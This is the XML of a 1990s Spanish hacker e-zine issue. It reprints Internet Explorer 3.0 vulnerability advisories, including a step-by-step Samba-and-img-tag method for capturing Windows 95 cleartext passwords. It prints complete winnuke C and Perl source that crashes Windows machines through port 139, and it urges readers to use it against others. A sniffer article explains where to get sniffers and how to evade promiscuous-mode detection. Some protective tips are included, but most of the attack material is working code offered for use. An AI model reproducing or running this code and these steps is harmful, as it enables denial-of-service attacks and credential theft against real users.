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color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS" w:cs="Comic Sans MS" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La Revista de Kike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS" w:cs="Comic Sans MS" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(&amp; company :)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS" w:cs="Comic Sans MS" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nº4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>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ores: Fragel , _^Virus^_, Kike(Lech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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INDICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1631" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>* Apartado 1-----------------------------------------------&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1631" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>* Apartado 2-----------------------------------------------&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bugs del Explorer 3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( Inglé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 Apartado 3-----------------------------------------------&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algo sobre Nu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Apartado 4-----------------------------------------------&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snif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Hola</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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Hola a todos de nuevo... y bienvenido a este numero 4. Esta revista dejara de ser mensual , ira saliendo de vez en cuando... Otra de las cosas es ke esta web personal, dejara de llamarse Kike´s Page ya ke formaremos yo y los kolaboradores un grupo de hackers, para elavorar la web, pero esto ya sera mas adelante... si kieres unirte a nosotros ta saves lo ke has de hacer...</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Bug del Explorer 3.0</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Is there any weight in this slight security breac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http://www.cs.princeton.edu/sip/news/Aug96-2.htm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lt;snip&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ugust 1996 Internet Explorer Security Flaw: Brief Descrip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We have discovered a security flaw in version 3.0 of Microsoft's Interne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Explorer browser running under Windows 95. An attacker could explo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the flaw to run any DOS command on the machine of an Explorer user wh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visits the attacker's page. For example, the attacker could rea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modify, or delete the victim's files, or insert a virus or backdo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entrance into the victim's machine. We have verified our discovery b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creat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 Web page that deletes a file on the machine of any Explorer user wh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visits the pag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The core of the attack is a technique for delivering a document to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victim's browser while bypassing the security checks that would normall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be applied to the document. If the document is, for example, a Microsof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Word template, it could contain a macro that executes any DO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command. The attacker could arrange things so the macro was execu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utomatically as a consequence of the victim visiting the attack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pag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Normally, before Explorer downloads a dangerous file like a Wor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document, it displays a dialog box warning that the file might contain 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viru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or other dangerous content, and asking the user whether to abort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download or to proceed with the download anyway. This gives the user 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chance to avoid the risk of a malicious document. However, our techniqu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llows an attacker to deliver a document without triggering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dialog box.</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The attack does not require the user to approve any actions by answer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questions, requesting a download, or opening a document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program. Merely visiting a Web page containing the attack is enough t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expose you to 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Microsoft has been notified and they are working on fixing the proble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Until a remedy is widely available, we will not disclose further detail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bout the flaw. Further details will appear on this page at a later dat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We do not know whether Windows NT users of Internet Explorer 3.0 ar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affected, though we suspect that they may b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This flaw was found by Dirk Balfanz and Edward Felten. Contact Felten if</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you have question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Princeton Universit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Department of Computer Scienc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Contact: sip@cs.princeton.ed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 &lt;snip&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gio@aros.net                Complete virtual hosting and business-orien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ystem administration         Internet services.  (WWW, FTP, emai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www.aros.net/          http://www.aros.net/about/virtua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re are only two industries that refer to their customers as 'us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Digital Announce Java Hack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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w: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th Feb 1997</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 Digital, in association with Ben Laurie and Major Malfunction, have fou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d exploited a loophole in Microsoft Internet Explorer V3.01.</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 brief, this loophole allows an attacker to connect to any TCP/IP port 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client's machin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less serious hole has also been found in Netscape Navigator V3.0. Th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s an attacker to discover the client's hostname and IP address despit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rewalls or even anonymiz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 Digital notified Microsoft and Netscape of these problems as soon as the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ere discovered, in January, and delayed public release to allow them to work</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round the problem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 Digital is a high-tech consultancy, specialising in Internet and securit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tters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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ull details can be found at http://www.alcrypto.co.uk/jav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WINDOWS 95 AND MSIE SECURITY HOL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FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w: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at's new</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t is possible from anywhere on the Internet to obtain the cleartex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ndows 95 login password from a Windows 95 computer on a network</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onnected directly to the Internet given only the IP address and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orkgroup and leave no trace of your actions. It is untested and may</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ork with Windows For Workgroups as wel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scrip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re has been recent discussion on security mailing lists concern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fact that Microsoft Internet Explorer running on Windows NT wil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utomatically try to log in to a remote SMB server (file serv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thout prompting the user or without the user's knowledge. By desig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NT machine will transmit to this remote server the encryp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assword and username of the user. This is documented by Aar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pangler. The caveats with this are that the passwords are encryp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nd that in many cases people do not use WWW browsers from NT serv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ut rather from computers running Windows 95.</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t has been explained that this same exploit does not work agains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ndows 95 because Windows 95 is only capable of accessing SMB shar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ile sharing) if they ar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Connected to the same subne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In the Windows 95 computer's LMHOSTS file on start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Announced to the Windows 95 computer by a Master Brows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t is this third and final condition that can be taken advantage of t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btain the cleartext password and username of any Windows 95 user wh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uses Microsoft Internet Explorer. Even careless use of Microsof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etwork Neighborhood can exploit this hole without the requireme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or Internet Explorer The requirements are knowledge of the user's I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ddress, workgroup name and that they access a hostile web page.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irst two are not difficult to obtain and the third does not have t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e an obscure page. In the last 6 months sites such as the CIA hav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een broken into. All it would require is that one un-noticeable lin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e added to the home page. Since the viewable content of the page ha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ot been altered, such a change can go unnoticed for a long tim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Explo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involves the use of the Unix SMB implementation called Samba.</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re are no source changes required, but it should be compiled with</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DEBUG_PASSWOR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amba has an option in the smb.cfg file called remote announce. Th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lows you to specify a network address (host or broadcast) a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orkgroup name to inform about your existence. I have configured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global] section of the smb.conf file like th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orkgroup = EXPLO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referred master = y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omain master = y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ecurity = us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ebug level = 100</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remote announce = 10.0.0.255/WORKGRO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only thing that must be changed is the remote announce line.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rest works as-is. A simple share must then be set up such a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plo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ath = /tm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ublic = no</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rowsable = y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othing needs to be in the directory as nobody will ever see it. F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sake of untractability, change your hostname to something tha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oes not exist, but ensure to create an entry for it in /etc/host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makes your host untraceable unless the network you are connect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monitors network traffic.</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Run smbd. If you are running it from inetd, the process must at leas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tart itself in order to send the broadcast. Using smbclient to brows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rself is enough for this. The broadcast gets sent regardless of</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hat smbd was started f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t this point if anyone on the target network were to look at thei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ndows 95 Network Neighborhood they would see the host "EXPLOIT".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host is now vulnerable to your attack. While this step may seem a b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bscure and complicated, the truth is that it is very simple. I wo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get into details here, but the methods for obtaining the workgroup</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ame are easy to use and readily available. Finding a target network</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at has not protected ports 137 and 139 is also not so hard. Onc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ve done that, setting everything up to here takes a very shor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mmount of tim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final and easiest step is to include the following in any htm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ile a user on this network access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lt;img src=file://\\exploit/exploit/t.gif&g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ongratulations!!! You will now see in your Samba log a line such a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checking user=[user] pass=[INNOCE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hat does this all mea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password of any Internet-connected user running Microsoft Interne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Explorer on Windows 95 obtained be found in cleartext provided tha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ir network administrator has not protected them from access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external SMB servers by closing ports 139 and 137. If you hav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btained the password of a user of a Windows NT server, you can now</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ake the username, password and workgroup and log into that Windows N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erver. Your true hostname and IP address are not stored in the html</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file and I am aware of no logging of hosts that enter the browse lis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means that you are not traceable, even though they are connect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your machine. If you are lucky, you found the Windows 95 machine of</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NT administrator and have little work left in order to access th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T server with administrator privileg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olution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Use Netscap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Use a proxy firewall or packet filter to close off ports 137 a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39 from external access to your network, though this still leav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you at risk from internal attack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Ask Microsoft to rewrite Windows to not send passwords by defaul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monstra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e're working on software that will allow anyone to try this out an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hope to have it finished tomorrow.</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sponses / Updat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March 17, 20:00pm: Microsoft Israel was informed of the proble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nd requested further informati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March 17, 22:30pm: This document initially comple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March 17, 00:30am: Final tests with remote sites complet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redit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scovery by Steve Birnbaum with help from Mark Gazi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dditional support from Yacov Drori and Roman Lask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anks also to hobbit for his paper on CIFS, BioH for helping to test</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and anyone else who helped or provided idea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sclaim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details of this exploit are being released with the interest of</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ecurity in mind. No malice or harm is intended towards any company o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rganization. We are not responsible for any actions taken based on</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is information, harmful or otherwis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Algo sobre nukes</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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Editado por kike(Lechuck)</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Bueno, hablaremos un poko sobre los nukes...</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troducción: Bueno, primero hay ke decir ke existen muchos tipos de Nukes, Nosotros hablaremos sobre el Nuke del puerto 139.</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Este tipo de nuke manda una información TCP/IP al ordenador víctima por el puerto nº139 (NET BIOS) provocándole un fallo en el sistema. En el ordenador víctima saldrá un error en Windows de la típica pantallita azul en modo ms-dos, y le provoca relentizamientos en el ordenador blokeos de aplicaciones, en fin... ke si no reinicia el ordenador lo tiene crudo.</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Pero este tipo de nukes solo funciona con sistemas Windows 95 o NT, y aveces en estos tampoco... Ya ke desactivan unas opciones en el protocolo TCP/IP.</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Como funciona: Este tipo de nuke es una cosa muy sencilla, simplemente se conecta al ordenador víctima por el puerto 139 y manda una información con el modo OUT of BAND.</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La información suele ser una palabra da igual si tiene una letra o varias... Y es importante</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ke el modo de envíos sea este nombrado. Simplemente es esto.. aki os dejo un programilla de este tipo de nukes. Compilado en Linux correctamente...</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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>programa:</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winnuke.c - (05/07/97)  By _eci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Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1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stdio.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string.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netdb.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netinet/in.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sys/types.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sys/socket.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clude &lt;unistd.h&g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define dport 139  /* Attack port: 139 is what we want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t x, s;</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char *str = "Bye";  /* Makes no diff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struct sockaddr_in addr, spoofedaddr;</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struct hostent *hos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t open_sock(int sock, char *server, int port)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struct sockaddr_in blah;</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struct hostent *he;</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bzero((char *)&amp;blah,sizeof(blah));</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blah.sin_family=AF_INE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blah.sin_addr.s_addr=inet_addr(server);</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blah.sin_port=htons(por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if ((he = gethostbyname(server)) != NULL)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bcopy(he-&gt;h_addr, (char *)&amp;blah.sin_addr, he-&gt;h_length);</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else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if ((blah.sin_addr.s_addr = inet_addr(server)) &lt; 0)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error("gethostbyname()");</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return(-3);</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if (connect(sock,(struct sockaddr *)&amp;blah,16)==-1)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error("connec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close(sock);</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return(-4);</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rintf("Connected to [%s:%d].\n",server,por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return;</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void main(int argc, char *argv[])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if (argc != 2)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rintf("Usage: %s &lt;target&gt;\n",argv[0]);</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exit(0);</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if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)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error("socke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exit(-1);</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open_sock(s,argv[1],dpor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rintf("Sending crash...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send(s,str,strlen(str),MSG_OOB);</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usleep(100000);</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printf("Done!\n");</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     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>close(s);</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>fin de programa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF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Aki hay otro ejemplo en lenguaje PERL. Funciona En todos los sistemas unix.</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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>programa:</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Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci</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use strict;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my($h,$p,$in_addr,$proto,$addr);</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h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);</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f (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n";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in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);</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proto = getprotobyname('tcp');</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socket(S, AF_INET, SOCK_STREAM, $proto) or die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connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;</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print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>fin de programa</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Bueno... ya veis ke los programas no son muy complicados .... Ahora hablaremos de komo protegerse i detectarlos...</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Para detectarlos primero hay ke protegerse ósea ke explicare como protegerse de este tipo de nukes : Para ello necesitaras tener desactivadas unas opciones en panel de contro_red_TCP/IP de acceso telefonico a redes_Enlaces, desactivar las opciones de compartir impresoras y archivos y cliente para redes Microsoft.... de esta manera el ordenador ya no estará escuchando por ese puerto... Entonces ahora hay ke detectar cuando alguien intenta nukearnos... Simplemente es haciendo un pekeño programa ke escuche por el puerto 139,</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 xml:space="preserve">entonces cuando alguien intente conectar por ese puerto.... He,he, le hemos pillado y ahora tenemos su dirección IP... </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t>Y de momento no tengo nada mas ke deciros, cuando sepa algo nuevo ya os lo comentare en otro numero de esta revista. Y decieros ke estoy haciendo un programa muy útil de nukes detector de nukes y cosas de este tipo,,, pero de momento se kereis nukear por este puerto necisitaras compilar el programilla ke os he puesto o si usas win95, utilizar el wnuke95 disponible en la web...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>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Editado por kike(Lechuck)</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Sniffers</w:t>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SNIFFERS POR FRAGEL</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Todos habreis oido hanlar de los sniffers, de como pueden emplearse,</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y de lo efectivos que pueden llegar a ser a la hora de hackear, si no es asi, DEJA DE LEER!!!, no, al contrario, lo que debes de hacer, es leer este articulo, porque lo he escrito pensando en personas que no conocen esta herramienta. NO voy a profundizar en absoluto, solamente voy a definir unas texturas generales del tema, para aclarar de que va y que entiendas de que va.</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En un principio, un sniffer es una herramienta para detectar errores en las redes que funcionan con el protocolo IPX (ethernet), pero, algun oportunista encontro en esta herramienta una forma de hackear esas redes ideal, el tio/a pensaría: "Koño!!, si en estas redes, los paquetes circulan en texto plano!!", Que quiere decir esto?, Ahora lo veremos:</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En una red que funcione con el protocolo IPX, las makinas se comunican enviando paquetes de informacion, como norma general, va en texto plano, osea no encriptado, y los paquetes, pasan por todas la makinas hasta llegar a la makina destino. La makina destinataria, reconoce el paquete por la cabecera, en la cual pone el nombre de la makina y su clave de acceso, con lo cual, todas las makinas a las que no corresponda la cabezera, ignoran el paquete cuando pasa a traves de ella (teoricamente), y aqui, es donde entra el sniffer. El sniffer actua poniendo la makina en modo promiscuo, esto quiere decir que acepta todos los paquetes independientemente de lo que su cabecera diga, en la cabezera del paquete capturado, encontramos el nombre y la clave de acceso de la makina destino, a la cual, simplemente no le llega el paquete o le da un mensaje de error. Algunos snnifers, solo capturan la cabecera o , cierto numero de bytes, porque, puedes imaginarte en una red con mas de 100 makinas, el peligro que supone para la nuestra poner el modo promiscuo, y recojer todos los paquetes XD.</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Bueno, y... de donde me puedo bajar un sniffer de esos?</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Pues, para empezar, aviso que si piensas usarlo, te asegures de que el sistema en el que lo ejecutes, no tenga ninguna clase de herramientas pa ar detectar el interfaz promiscuo, para ello, vas a tener que buscar informacion mas precisa y mas técnica que puedes encontrar tanto en las paginas de hackers, como en las de seguridad (incluso más en las segundas), ya que una cosa, va cojida de la mano de la otra. De todos modos, te digo donde te puedes bajar un par de sniffers:</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 xml:space="preserve">Para Sunos hay uno realmente efectivo y de tamaño muy reducido que ademas solo captura los rpimeros 300bytes de cada paquete. Fue publicado en la archyfamosa revista Phrack. Es el Esniff.c te lo puedes bajar en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coombs.anu.edu.au:/pub/net/log.</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 xml:space="preserve">Cabe recordar, que en sunos, con el comando ifconfig -a, el administrador del sistema puede detectar en todo momento el modo promiscuo, para que vayais con cuidado.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 xml:space="preserve">Para DOS, tenemos el ethdump v1.03, que se puede conseguir en el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ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip</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editado por fragel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>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Este mes poko kontenido sorry!</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KIKE´S PAGE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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www.geocities.com/siliconvalley/Pines/5791</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Mail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">kiket@geocities.com </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Hasta la proxima Revist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